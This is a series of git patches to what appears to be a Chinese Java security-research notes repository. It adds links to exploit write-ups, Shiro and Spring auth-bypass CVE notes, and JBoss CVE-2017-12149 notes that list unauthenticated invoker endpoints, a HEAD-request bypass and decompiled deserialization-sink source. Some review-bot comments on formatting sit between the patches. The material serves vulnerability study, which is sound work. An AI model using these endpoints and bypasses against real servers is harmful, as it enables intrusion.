"java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a778fc9..176579a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -140,3 +140,4 @@ + 2022/06/22 [关于Tomcat中的三个Context的理解](https://yzddmr6.com/posts/tomcat-context/) + 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** + 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** ++ 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** From f65caaf7b8980cac7f91d764ebd37ac0de0397b1 Mon Sep 17 00:00:00 2001 
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 25 Jun 2022 22:30:37 +0800 Subject: [PATCH 084/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 176579a..7707a95 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -141,3 +141,4 @@ + 2022/06/24 [利用tomcat自动部署机制getshell](https://novysodope.github.io/2022/06/01/82/) **tocmat 文件上传war目录穿越到webapps目录 getshell** + 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** + 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** ++ 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** From 57e516fe9bfaf3b6741fe68f6e936fb8b4a8f4e0 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 25 Jun 2022 22:44:18 +0800 Subject: [PATCH 085/332] Update Readme.md --- SnakeYaml/Readme.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md index ec4c550..cf6bec6 100644 --- a/SnakeYaml/Readme.md +++ b/SnakeYaml/Readme.md @@ -1,7 +1,9 @@ # snakeyaml ## 不出网利用 ->通过fastjson写文件如何本地加载rce +>通过写文件然后本地加载rce + +//todo 写一个工具 去完成 https://xz.aliyun.com/t/10655 From 7b70f617cbdd71ebd25336b2cdeb6d1b22c736ea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 27 Jun 2022 22:28:08 +0800 Subject: [PATCH 086/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7707a95..8fae1f4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -142,3 +142,4 @@ + 2022/06/24 [记一次Spring Devtools反序列化利用](https://xz.aliyun.com/t/8349) **非常不错而且居然是2020年的知识** + 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** + 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** ++ 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** From 8b296e1c18e4399452d2dc598206df74779402dc Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 27 Jun 2022 23:12:36 +0800 Subject: [PATCH 087/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 8fae1f4..a159900 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -143,3 +143,4 @@ + 2022/06/25 [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) **对认证过后spring分发器的分析不错,自己之前就遇到了404的问题** + 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** + 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** ++ 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** From 12bfda258a9263bc6405c25f850297639ef3771b Mon Sep 17 00:00:00 2001 
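Review bot: In SnakeYaml/Readme.md, the added line `//todo 写一个工具 去完成` is a code-style TODO placed in Markdown body text, where it renders as a literal paragraph under `不出网利用`. Track it as an issue or a task-list item instead. The reworded quote line also drops `fastjson` from the original sentence, so the section no longer says which file-write primitive it assumes; if the generalisation is intended, say so in one sentence.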
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 29 Jun 2022 08:53:45 +0800 Subject: [PATCH 088/332] Update Readme.md --- .../Readme.md" | 3 +++ 1 file changed, 3 insertions(+) diff --git "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" index 90be438..6073000 100644 --- "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" +++ "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" @@ -155,7 +155,10 @@ pom.xml 中版本修改为 1.7.0 或及以下即可 /admin/%20 ``` +## CVE-2022-32532 +[CVE-2022-32532](https://github.com/4ra1n/CVE-2022-32532) +原理参考[CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) >参考: > From 0375cf9efffa189c8c02f2057f4d31bb3cb497dc Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 30 Jun 2022 09:57:35 +0800 Subject: [PATCH 089/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a159900..b8c200b 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -47,7 +47,7 @@ + 2021/10/26 [Hessian 原理分析](https://www.cnblogs.com/shangxiaofei/p/4222170.html) 大概就是以二进制数组传输的rpc,存在反序列化问题。 + 2021/10/26 [XXL-JOB Hessian2反序列化漏洞](https://www.mi1k7ea.com/2021/04/22/XXL-JOB-Hessian2%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/) + 2021/10/30 [Mojarra JSF ViewState 反序列化漏洞](https://blog.csdn.net/xuandao_ahfengren/article/details/113135364) -+ 2021/11/02 [关于Java 中 XXE 的利用限制探究](https://www.freebuf.com/articles/web/284225.html) **使用http外带数据不能有换行,使用ftp可以解决,但是ftp在java 8u131修复了这个漏洞 CVE-2017-3533** ++ 2021/11/02 [关于Java 中 XXE 的利用限制探究](https://www.freebuf.com/articles/web/284225.html) **使用http外带数据不能有换行,使用ftp可以解决,但是ftp在java 8u131修复了这个漏洞 CVE-2017-3533** [代码修复](https://github.com/openjdk/jdk8u-dev/commit/644ddd7722bea502f029378c22d51b6eb66f8c25) + 2021/11/02 [Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)](https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.zh-cn.md) 暴露接口反序列化。。。 + 2021/11/03 [浅谈Liferay Portal JSON Web Service未授权反序列化远程代码执行漏洞](https://xz.aliyun.com/t/7485) + 2021/11/03 [H2 Database Console 未授权访问](https://github.com/vulhub/vulhub/blob/master/h2database/h2-console-unacc/README.zh-cn.md) From e4ce9bdc0217e92f8c14105f3ee8066c2fdb121b Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 2 Jul 2022 16:11:38 +0800 Subject: [PATCH 090/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b8c200b..b82a05e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -144,3 +144,4 @@ + 2022/06/25 [【新手入门系列】 一步一步教你漏洞挖掘之如何在半黑盒模式下挖掘RCE漏洞](https://mp.weixin.qq.com/s/nusGsstudrQt2dwZxHXKgg) **客服端漏洞挖掘。。** + 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** + 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** ++ 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) From 521cf5dd53eeeca310a7ab8f239a25d9e0433991 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 3 Jul 2022 20:21:01 +0800 Subject: [PATCH 091/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b82a05e..415bb41 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -145,3 +145,4 @@ + 2022/06/27 [Beanshell未授权利用简析](https://www.kitsch.live/2021/09/22/beanshell%e6%9c%aa%e6%8e%88%e6%9d%83%e5%88%a9%e7%94%a8%e7%ae%80%e6%9e%90/) **其他绕过方法** + 2022/06/27 [漏洞检测的那些事儿](https://paper.seebug.org/9/) **漏洞检测相关的知识** + 2022/07/02 [记一次无文件Webshell攻击分析](https://changxia3.com/2021/07/13/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%97%A0%E6%96%87%E4%BB%B6Webshell%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/) ++ 2022/07/03 [第16篇:Weblogic 2019-2729反序列化漏洞绕防护拿权限的实战过程](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484303&idx=1&sn=58cbb4d7f63b9276bb89eeac286d174c&chksm=c25fccf4f52845e241256c2f425003b73b6061b3d1964dcd4a184a2cda1b4d8761098227e6de&mpshare=1&scene=23&srcid=0703XRThsRmunAKy5fSIYQKh&sharer_sharetime=1656786411917&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **其中的获取weblogic路径不错** From 5658e488a7fe1486912002ab287817ee32e70eca Mon Sep 17 00:00:00 2001 
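Review bot: in PATCH 091/332 the added 2022/07/03 entry commits the WeChat URL with its share-tracking query parameters still attached (`mpshare`, `scene`, `srcid`, `sharer_sharetime`, `sharer_shareid`). By their names these describe the share event rather than the article, and they make the line far longer than its neighbours; trim the link to the parameters that identify the article before merging.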
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 13:24:24 +0800 Subject: [PATCH 092/332] Update README.md --- Jboss/README.md | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/Jboss/README.md b/Jboss/README.md index 029922c..840d1a5 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -1,4 +1,4 @@ -## jboss介绍: +# jboss介绍: JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开放源代码/114160)的[应用服务器](https://baike.baidu.com/item/应用服务器/4971773)。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 @@ -6,3 +6,14 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 所以自己想写一个综合利用的工具。。。 + [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) + +## CVE-2017-12149 + +**endpoint** +``` +/invoker/readonly +/invoker/EJBInvokerServlet +/invoker/JMXInvokerServlet +/invoker/readonly/JMXInvokerServlet +/invoker/restricted/JMXInvokerServlet +``` From 5c7898aae22bcfeae2dd48ce1b62f57808317143 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 13:30:14 +0800 Subject: [PATCH 093/332] Update README.md --- Jboss/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Jboss/README.md b/Jboss/README.md index 840d1a5..05bb751 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -8,7 +8,7 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 + [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) ## CVE-2017-12149 - +bypass 请求方式是HEAD **endpoint** ``` /invoker/readonly From 9bedef620fa3a13cf65efd526a50fcdfd6030dbf Mon Sep 17 00:00:00 2001 
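Review bot: in PATCH 093/332 the new line `bypass 请求方式是HEAD` replaces the blank line between the `## CVE-2017-12149` heading and `**endpoint**`, so the two lines have no blank line between them and Markdown will render them as one paragraph. Keep a blank line before `**endpoint**`, and say what is being bypassed; the only hint on the page is the linked article title, which refers to a WAF.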
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 13:30:28 +0800 Subject: [PATCH 094/332] Update README.md --- Jboss/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Jboss/README.md b/Jboss/README.md index 05bb751..10fa4ff 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -9,6 +9,7 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 ## CVE-2017-12149 bypass 请求方式是HEAD + **endpoint** ``` /invoker/readonly From 90e4dc33aec17ad352ad094d770eb7d92803452c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 13:59:33 +0800 Subject: [PATCH 095/332] Update README.md --- Jboss/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Jboss/README.md b/Jboss/README.md index 10fa4ff..aa2b85d 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -12,7 +12,7 @@ bypass 请求方式是HEAD **endpoint** ``` -/invoker/readonly +/invoker/readonly 是一个filter 请求方法随便并且url后面可以加其他的 /invoker/EJBInvokerServlet /invoker/JMXInvokerServlet /invoker/readonly/JMXInvokerServlet From 566fae7b414b0391b9c6ab5e6ca3ecc0eedc3549 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Jul 2022 14:03:06 +0800 Subject: [PATCH 096/332] Update README.md --- Jboss/README.md | 490 +++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 489 insertions(+), 1 deletion(-) diff --git a/Jboss/README.md b/Jboss/README.md index aa2b85d..6e56210 100644 --- a/Jboss/README.md +++ b/Jboss/README.md @@ -7,7 +7,7 @@ JBoss 是一个基于J2EE的[开放源代码](https://baike.baidu.com/item/开 + [JBOSS CVE-2017-12149 WAF绕过之旅](https://www.yulegeyu.com/2021/03/05/JBOSS-CVE-2017-12149-WAF%E7%BB%95%E8%BF%87%E4%B9%8B%E6%97%85/) -## CVE-2017-12149 +## 反序列化漏洞 bypass 请求方式是HEAD **endpoint** 
@@ -18,3 +18,491 @@ bypass 请求方式是HEAD /invoker/readonly/JMXInvokerServlet /invoker/restricted/JMXInvokerServlet ``` +http-invoker.sar 组件的问题 + +web.xml + +```xml + + + + + + + ReadOnlyAccessFilter + org.jboss.invocation.http.servlet.ReadOnlyAccessFilter + + readOnlyContext + readonly + The top level JNDI context the filter will enforce + read-only access on. If specified only Context.lookup operations + will be allowed on this context. Another other operations or lookups + on any other context will fail. Do not associate this filter with the + JMXInvokerServlets if you want unrestricted access. + + + + invokerName + jboss:service=NamingBeanImpl + The JMX ObjectName of the naming service mbean + + + + + + ReadOnlyAccessFilter + /readonly/* + + + + + EJBInvokerServlet + The EJBInvokerServlet receives posts containing serlized + MarshalledInvocation objects that are routed to the EJB invoker given by + the invokerName init-param. The return content is a serialized + MarshalledValue containg the return value of the inovocation, or any + exception that may have been thrown. + + org.jboss.invocation.http.servlet.InvokerServlet + + invokerName + jboss:service=invoker,type=http + The RMI/HTTP EJB compatible invoker + + 1 + + + JMXInvokerServlet + The JMXInvokerServlet receives posts containing serlized + MarshalledInvocation objects that are routed to the invoker given by + the the MBean whose object name hash is specified by the + invocation.getObjectName() value. The return content is a serialized + MarshalledValue containg the return value of the inovocation, or any + exception that may have been thrown. + + org.jboss.invocation.http.servlet.InvokerServlet + 1 + + + + JNDIFactory + A servlet that exposes the JBoss JNDI Naming service stub + through http. The return content is a serialized + MarshalledValue containg the org.jnp.interfaces.Naming stub. This + configuration handles requests for the standard JNDI naming service. 
+ + org.jboss.invocation.http.servlet.NamingFactoryServlet + + namingProxyMBean + jboss:service=invoker,type=http,target=Naming + + + proxyAttribute + Proxy + + 2 + + + + ReadOnlyJNDIFactory + A servlet that exposes the JBoss JNDI Naming service stub + through http, but only for a single read-only context. The return content + is a serialized MarshalledValue containg the org.jnp.interfaces.Naming + stub. + + org.jboss.invocation.http.servlet.NamingFactoryServlet + + namingProxyMBean + jboss:service=invoker,type=http,target=Naming,readonly=true + + + proxyAttribute + Proxy + + 2 + + + + + JNDIFactory + /JNDIFactory/* + + + + ReadOnlyJNDIFactory + /ReadOnlyJNDIFactory/* + + + EJBInvokerServlet + /EJBInvokerServlet/* + + + JMXInvokerServlet + /JMXInvokerServlet/* + + + + JMXInvokerServlet + /readonly/JMXInvokerServlet/* + + + + + JNDIFactory + /restricted/JNDIFactory/* + + + JMXInvokerServlet + /restricted/JMXInvokerServlet/* + + + + + + HttpInvokers + An example security config that only allows users with the + role HttpInvoker to access the HTTP invoker servlets + + /restricted/* + GET + POST + + + HttpInvoker + + + + BASIC + JBoss HTTP Invoker + + + + HttpInvoker + + +``` +org.jboss.invocation.http.servlet.ReadOnlyAccessFilter +```java +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by FernFlower decompiler) +// + +package org.jboss.invocation.http.servlet; + +import java.io.IOException; +import java.io.ObjectInputStream; +import java.lang.reflect.Method; +import java.security.Principal; +import java.util.Map; +import javax.management.MBeanServer; +import javax.management.ObjectName; +import javax.servlet.Filter; +import javax.servlet.FilterChain; +import javax.servlet.FilterConfig; +import javax.servlet.ServletException; +import javax.servlet.ServletInputStream; +import javax.servlet.ServletRequest; +import javax.servlet.ServletResponse; +import javax.servlet.http.HttpServletRequest; +import org.jboss.invocation.MarshalledInvocation; 
+import org.jboss.logging.Logger; +import org.jboss.mx.util.MBeanServerLocator; + +public class ReadOnlyAccessFilter implements Filter { + private static Logger log = Logger.getLogger(ReadOnlyAccessFilter.class); + private FilterConfig filterConfig = null; + private String readOnlyContext; + private Map namingMethodMap; + + public ReadOnlyAccessFilter() { + } + + public void init(FilterConfig filterConfig) throws ServletException { + this.filterConfig = filterConfig; + if (filterConfig != null) { + this.readOnlyContext = filterConfig.getInitParameter("readOnlyContext"); + String invokerName = filterConfig.getInitParameter("invokerName"); + + try { + MBeanServer mbeanServer = MBeanServerLocator.locateJBoss(); + ObjectName mbean = new ObjectName(invokerName); + this.namingMethodMap = (Map)mbeanServer.getAttribute(mbean, "MethodMap"); + } catch (Exception var5) { + log.error("Failed to init ReadOnlyAccessFilter", var5); + throw new ServletException("Failed to init ReadOnlyAccessFilter", var5); + } + } + + } + + public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException { + HttpServletRequest httpRequest = (HttpServletRequest)request; + Principal user = httpRequest.getUserPrincipal(); + if (user == null && this.readOnlyContext != null) { + ServletInputStream sis = request.getInputStream(); + ObjectInputStream ois = new ObjectInputStream(sis); + MarshalledInvocation mi = null; + + try { + mi = (MarshalledInvocation)ois.readObject(); + } catch (ClassNotFoundException var10) { + throw new ServletException("Failed to read MarshalledInvocation", var10); + } + + request.setAttribute("MarshalledInvocation", mi); + mi.setMethodMap(this.namingMethodMap); + Method m = mi.getMethod(); + if (m != null) { + this.validateAccess(m, mi); + } + } + + chain.doFilter(request, response); + } + + public void destroy() { + } + + public String toString() { + if (this.filterConfig == null) { + return "NamingAccessFilter()"; + 
} else { + StringBuffer sb = new StringBuffer("NamingAccessFilter("); + sb.append(this.filterConfig); + sb.append(")"); + return sb.toString(); + } + } + + private void validateAccess(Method m, MarshalledInvocation mi) throws ServletException { + boolean trace = log.isTraceEnabled(); + if (trace) { + log.trace("Checking against readOnlyContext: " + this.readOnlyContext); + } + + String methodName = m.getName(); + if (!methodName.equals("lookup")) { + throw new ServletException("Only lookups against " + this.readOnlyContext + " are allowed"); + } else { + Object[] args = mi.getArguments(); + Object arg = args.length > 0 ? args[0] : ""; + String name; + if (arg instanceof String) { + name = (String)arg; + } else { + name = arg.toString(); + } + + if (trace) { + log.trace("Checking lookup(" + name + ") against: " + this.readOnlyContext); + } + + if (!name.startsWith(this.readOnlyContext)) { + throw new ServletException("Lookup(" + name + ") is not under: " + this.readOnlyContext); + } + } + } +} +``` +org.jboss.invocation.http.servlet.InvokerServlet +```java +// +// Source code recreated from a .class file by IntelliJ IDEA +// (powered by FernFlower decompiler) +// + +package org.jboss.invocation.http.servlet; + +import java.io.IOException; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.InvocationTargetException; +import java.security.AccessController; +import java.security.Principal; +import java.security.PrivilegedAction; +import javax.management.MBeanServer; +import javax.management.MalformedObjectNameException; +import javax.management.ObjectName; +import javax.servlet.ServletConfig; +import javax.servlet.ServletException; +import javax.servlet.ServletInputStream; +import javax.servlet.ServletOutputStream; +import javax.servlet.http.HttpServlet; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.jboss.invocation.InvocationException; +import 
org.jboss.invocation.MarshalledInvocation; +import org.jboss.invocation.MarshalledValue; +import org.jboss.logging.Logger; +import org.jboss.mx.util.JMXExceptionDecoder; +import org.jboss.mx.util.MBeanServerLocator; +import org.jboss.security.SecurityAssociation; +import org.jboss.system.Registry; + +public class InvokerServlet extends HttpServlet { + private static Logger log = Logger.getLogger(InvokerServlet.class); + private static String REQUEST_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"; + private static String RESPONSE_CONTENT_TYPE = "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"; + private MBeanServer mbeanServer; + private ObjectName localInvokerName; + + public InvokerServlet() { + } + + public void init(ServletConfig config) throws ServletException { + super.init(config); + + try { + String name = config.getInitParameter("invokerName"); + if (name != null) { + this.localInvokerName = new ObjectName(name); + log.debug("localInvokerName=" + this.localInvokerName); + } + } catch (MalformedObjectNameException var3) { + throw new ServletException("Failed to build invokerName", var3); + } + + this.mbeanServer = MBeanServerLocator.locateJBoss(); + if (this.mbeanServer == null) { + throw new ServletException("Failed to locate the MBeanServer"); + } + } + + public void destroy() { + } + + protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + boolean trace = log.isTraceEnabled(); + if (trace) { + log.trace("processRequest, ContentLength: " + request.getContentLength()); + log.trace("processRequest, ContentType: " + request.getContentType()); + } + + Boolean returnValueAsAttribute = (Boolean)request.getAttribute("returnValueAsAttribute"); + + try { + response.setContentType(RESPONSE_CONTENT_TYPE); + MarshalledInvocation mi = (MarshalledInvocation)request.getAttribute("MarshalledInvocation"); + if 
(mi == null) { + ServletInputStream sis = request.getInputStream(); + ObjectInputStream ois = new ObjectInputStream(sis); + mi = (MarshalledInvocation)ois.readObject(); + ois.close(); + } + + if (mi.getPrincipal() == null && mi.getCredential() == null) { + mi.setPrincipal(InvokerServlet.GetPrincipalAction.getPrincipal()); + mi.setCredential(InvokerServlet.GetCredentialAction.getCredential()); + } + + Object[] params = new Object[]{mi}; + String[] sig = new String[]{"org.jboss.invocation.Invocation"}; + ObjectName invokerName = this.localInvokerName; + if (invokerName == null) { + Integer nameHash = (Integer)mi.getObjectName(); + invokerName = (ObjectName)Registry.lookup(nameHash); + if (invokerName == null) { + throw new ServletException("Failed to find invoker name for hash(" + nameHash + ")"); + } + } + + Object value = this.mbeanServer.invoke(invokerName, "invoke", params, sig); + if (returnValueAsAttribute != null && returnValueAsAttribute) { + request.setAttribute("returnValue", value); + } else { + MarshalledValue mv = new MarshalledValue(value); + ServletOutputStream sos = response.getOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(sos); + oos.writeObject(mv); + oos.close(); + } + } catch (Throwable var13) { + Throwable t = JMXExceptionDecoder.decode(var13); + if (t instanceof InvocationTargetException) { + InvocationTargetException ite = (InvocationTargetException)t; + t = ite.getTargetException(); + } + + InvocationException appException = new InvocationException(t); + if (returnValueAsAttribute != null && returnValueAsAttribute) { + log.debug("Invoke threw exception", t); + request.setAttribute("returnValue", appException); + } else if (response.isCommitted()) { + log.error("Invoke threw exception, and response is already committed", t); + } else { + response.resetBuffer(); + MarshalledValue mv = new MarshalledValue(appException); + ServletOutputStream sos = response.getOutputStream(); + ObjectOutputStream oos = new 
ObjectOutputStream(sos); + oos.writeObject(mv); + oos.close(); + } + } + + } + + protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + this.processRequest(request, response); + } + + protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + this.processRequest(request, response); + } + + public String getServletInfo() { + return "An HTTP to JMX invocation servlet"; + } + + private static class GetCredentialAction implements PrivilegedAction { + static PrivilegedAction ACTION = new InvokerServlet.GetCredentialAction(); + + private GetCredentialAction() { + } + + public Object run() { + Object credential = SecurityAssociation.getCredential(); + return credential; + } + + static Object getCredential() { + Object credential = AccessController.doPrivileged(ACTION); + return credential; + } + } + + private static class GetPrincipalAction implements PrivilegedAction { + static PrivilegedAction ACTION = new InvokerServlet.GetPrincipalAction(); + + private GetPrincipalAction() { + } + + public Object run() { + Principal principal = SecurityAssociation.getPrincipal(); + return principal; + } + + static Principal getPrincipal() { + Principal principal = (Principal)AccessController.doPrivileged(ACTION); + return principal; + } + } +} +``` From dd1fe2e2aba2fdfc7696cab2bea729323bdca28d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 10 Jul 2022 13:49:49 +0800 Subject: [PATCH 097/332] Update Readme.md --- .../Velocity/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" index 3a3feb9..678fd9a 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -1,4 +1,5 @@ # 真实例子 Confluence CVE-2019-3396 +Jira CVE-2019-11581 From 284f248d9b86e59849cc61c4da798896b4f94d8d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 10 Jul 2022 14:03:42 +0800 Subject: [PATCH 098/332] Update Readme.md --- .../Velocity/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" index 678fd9a..f6c05c2 100644 --- "a/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" +++ "b/java\346\250\241\346\235\277\346\263\250\345\205\245/Velocity/Readme.md" @@ -1,5 +1,6 @@ # 真实例子 Confluence CVE-2019-3396 + Jira CVE-2019-11581 From e9ada9eb1e24bd231112b09ac1b07002d373c587 Mon Sep 17 00:00:00 2001 From: Firebasky 